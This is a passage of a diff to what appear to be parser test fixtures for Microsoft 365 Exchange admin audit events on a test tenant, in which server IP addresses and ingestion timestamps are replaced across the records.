GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -6635,12 +6635,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -6683,7 +6683,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -6695,8 +6695,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177814600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853420Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -6716,12 +6716,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -6753,7 +6753,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -6765,8 +6765,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177817400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:21\",\"ExternalAccess\":true,\"Id\":\"86a8ddaf-15d2-44b4-62d5-08d7adfc1062\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853424100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:21\",\"ExternalAccess\":true,\"Id\":\"86a8ddaf-15d2-44b4-62d5-08d7adfc1062\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 
(67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6786,12 +6786,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6834,7 +6834,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -6846,8 +6846,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177820200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"8b544cbd-f42b-4910-82ef-08d7ac0f26fc\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853428800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"8b544cbd-f42b-4910-82ef-08d7ac0f26fc\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -6867,12 +6867,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -6915,7 +6915,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -6927,8 +6927,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177822900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": 
"2021-12-09T13:42:30.853434300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -6948,12 +6948,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -6984,7 +6984,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -6996,8 +6996,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177825600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:07\",\"ExternalAccess\":true,\"Id\":\"d7134fa4-2e25-4a7d-d84d-08d7adfc0802\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853439400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:07\",\"ExternalAccess\":true,\"Id\":\"d7134fa4-2e25-4a7d-d84d-08d7adfc0802\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
 "code": "ExchangeAdmin",
 "provider": "Exchange",
 "kind": "event",
@@ -7017,12 +7017,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -7065,7 +7065,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -7077,8 +7077,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177828300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853445200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -7098,12 +7098,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -7133,7 +7133,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
